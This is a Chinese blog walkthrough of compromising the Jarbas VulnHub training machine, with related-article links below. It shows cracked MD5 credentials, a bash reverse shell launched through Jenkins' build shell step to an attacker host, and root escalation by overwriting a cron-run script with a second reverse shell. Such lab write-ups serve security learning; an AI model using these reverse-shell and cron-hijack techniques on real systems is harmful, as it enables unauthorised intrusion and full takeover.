jarbas靶机攻略

最新推荐文章于 2024-05-30 00:08:38 发布
最新推荐文章于 2024-05-30 00:08:38 发布
阅读量83 收藏
点赞数 1
分类专栏: 靶机系列 文章标签: 前端 网络 安全 学习方法 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58683895/article/details/133916242
版权

jarbas

扫描

image-20231018205717669

使用目录扫描扫出来两个页面

image-20231018174327991

8080端口的扫描结果如图

image-20231018213049371

image-20231018213110102

其中8080应该是后台登录框

robots文件内容如图

image-20231018213350904

渗透

进入第一个页面

image-20231018174431977

发现疑似加密的东西

tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98

image-20231018203304784

改密码为md5密码,使用john解码

john pojie1.txt --format=RAW-MD5

marianna    
vipsu    
italia99

此处直接对应密码是无法登陆的,最后尝试的发现正确可登录的对应为

eder:vipsu

(此处尝试了使用bp交叉匹配,但是最后返回值完全相同无法判别哪个是正确的,可能是因为用户密码被转义了,不确定)

image-20231018214350759

这个是jenkins工具平台,网上查阅相关漏洞操作

最常用的是执行shell

操作如图

image-20231018214605393

image-20231018214722420

image-20231018214800454

/bin/bash -i >& /dev/tcp/10.4.7.138/12138 0>&1

image-20231018214953144

kali开启监听后点击此处执行shell

image-20231018215026517

成功反弹

image-20231018215048677

提权

此处经过常规的一系列尝试,并没有有效的

查阅学习后,尝试走计划任务方向

cat /etc/crontab
#也可能是cron.d

发现有一个五分钟执行一次的任务

开启一个新的监听端口9999

echo "/bin/bash -i >& /dev/tcp/10.4.7.138/9999 0>&1" > /etc/script/CleaningScript.sh

将反弹shell命令覆盖原脚本文件,等待五分钟执行

反弹过后即提权成功

image-20231018221055436

image-20231018221310599

order libra
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
论文研究 - 加强高中地理制图的使用
05-19
首先,根据Jarbas Passarinho School高中2年级学生研究的教科书内容,这项工作基于针对性文献综述,通过使用人造卫星(Google Earth)的图像开展实际活动来开展。 在进行此类活动时,已经注意到学生和老师在处理...
jarbasmedeiros
03-07
你好呀 :waving_hand: 我是Jarbas Medeiros 后端开发人员 :seedling: 我目前正在学习有关Java和Spring Boot的更多信息 :closed_mailbox_with_raised_flag: 如何联系我: 语言和框架 操作系统和工具 关于我
红队打靶:JARBAS详细打靶思路(vulnhub)
Bossfrank的博客
06-03 1618
本文是vulnhub靶机JARBAS详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。
渗透靶场之Jarbas
m0_56190544的博客
07-09 534
完整的解析了vulnhub靶场中的Jarbas的渗透过程,包括一些命令使用的细节,提供大家借鉴学习!
小白渗透之旅——Jarbas靶场(急速版)
最新发布
qq_52849046的博客
05-30 695
这篇博客是为小编自己学习记录的同时,分享出来让大神们共同检阅,如有问题,还请各位大神在评论区多多指点。ps:此文章仅供学习,切勿用于实战。容易被gangan
红队渗透靶场之Jarbas靶场(超详细)
xf555er的博客
11-26 1320
Jarbas靶场演练, 红队渗透必学靶场
Vulnhub系列Jarbas靶机(三种方法)
2301_80203701的博客
12-18 1085
哎,有个root和jenkins但是不是/bash ,也没有什么,那看看有什么定时任务吧。好像一直在提示我们java,估计是要利用java相关的知识,可惜我不会(先走着看看吧)。换个端口进行反弹shell万一与上次的冲突就完蛋了,那就吃点东西等着反弹上来吧。随便点点看,看到一个可以创建任务,应该可以写入一个反弹shell脚本。有可能是个网站后台的登录账号或者是ssh连接的账号密码,先记着。不知道为什么这个靶机有点怪怪的,不知道是不是我搞的太多了。开放了22,80,3306,8080端口这四个全是突破口。
jarbas靶场渗透笔记
m0_60571990的博客
03-10 376
jarbas靶场渗透笔记
PyPI 官网下载 | jarbas_hive_mind-0.3.5.tar.gz
02-01
《PyPI上的jarbas_hive_mind-0.3.5.tar.gz:探索Hadoop大数据世界的工具》 PyPI(Python Package Index)是Python开发者的重要资源库,它为全球的Python程序员提供了丰富的软件包和模块。在PyPI上,我们可以找到名...
VulnHub系列之Jarbas渗透测试
Flynn的博客
04-26 1116
jarbas 虚拟机:https://www.vulnhub.com/entry/jarbas-1,232/ 如果你想继续你的黑客研究,请试试这台机器! Jarbas 1.0 – 向 90 年代末怀旧的巴西搜索引擎致敬。 目标:获取root shell!
jarbas--靶机实操详解
qq_61802750的博客
10-12 249
枚举类型通常用于为程序中的一组相关的常量取名字,以便于程序的可读性和维护性。我们看到,最下边有条记录,每五分钟以root的权限,执行这个shell脚本,执行结果就是把它扔掉。80端口是http,击面很大,可以优先考虑。我们现在就在jackson这个账户,有不正常的交互。我们去识别一下下面的字符,看看是什么加密方式,不出意外的话就是MD5。我们试一下,使用eder账号,密码使用vipsu。那我们再写入一个shell,打开监听,看看是否是root权限。index是我们当前的页面,我们先访问一下access。
【学渗透靶机 ——JARBAS
jieli0901227的博客
04-05 256
通过nmap 扫描结果发现有两个IP,192.168.241.140 为 KALI。这个页面中加密字符串,通过kali工具判断有可能是MD5,passwd 能够查看,而shadow 文件没有查看权限。尝试访问/etcpasswd 和/etc/shadow。使用burp 抓包后台登录界面进行尝试爆破。发现80端口有两个页面,而8080没有。(2)还发现构造项目中可以命令执行。写入反弹shell ,保存后。访问index为默认页面,但是反弹shell没有成功。成功拿到webshell。计划任务中脚本有写权限,
靶机精讲之JARBAS
m0_63285023的博客
04-05 468
靶机精讲之JARBAS
靶机实操—JARBAS—学习笔记
qq_46965422的博客
03-13 290
Jarbas 1.0 – 向 90 年代末怀旧的巴西搜索引擎致敬。 目标:获取 root shell!
JARBAS - VulnHub(漏洞靶场渗透测试)
Start C的博客
12-06 322
VulnHub的一个靶场
基于jarbas渗透测试的学习笔记
gaily123的博客
10-26 569
实验环境 kali:192.168.79.130 jarbas:192.168.79.141 均为NAT模式 实验步骤 1.主机发现 nmap -sP 192.168.79.0/24 主机ip是192.168.79.141 2.端口发现 nmap -A -vv 192.168.79.141 发现主机开放的端口是22 80 3306 8080 3.目录发现 dirb http://192.168...
vulhub-Jarbas(易)
leo788的博客
05-29 1025
jarbas靶场很简单,可以用来熟悉打靶场的流程,同时掌握反弹shell的使用。
vulnhub——JARBAS
m0_61619198的博客
07-09 159
vulnhub——JARBAS
打靶:vulnhub中的JARBAS
qq_73865998的博客
04-08 884
复现视频:【「红队笔记」靶机精讲:JARBAS - Jenkins渗透原理详解,一个典型CMS渗透测试样本。
Vulnhub -- jarbas靶机渗透
Gh0st_1n_The_Shell的博客
05-31 653
信息收集 扫描开放的端口 进行目录爆破 尝试击 提权 提权--信息收集 目标:拿到服务器的Shell 信息收集 配置好后用nmap扫描 kali's ip:192.168.241.131 nmap -sP 192.168.241.131/24 一个个扫描 发现192.168.241.2是Vmware的服务,猜测jarbas的IP地址为192.168.241.142 扫描开放的端口 nmap -sV 192.168.241.142 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值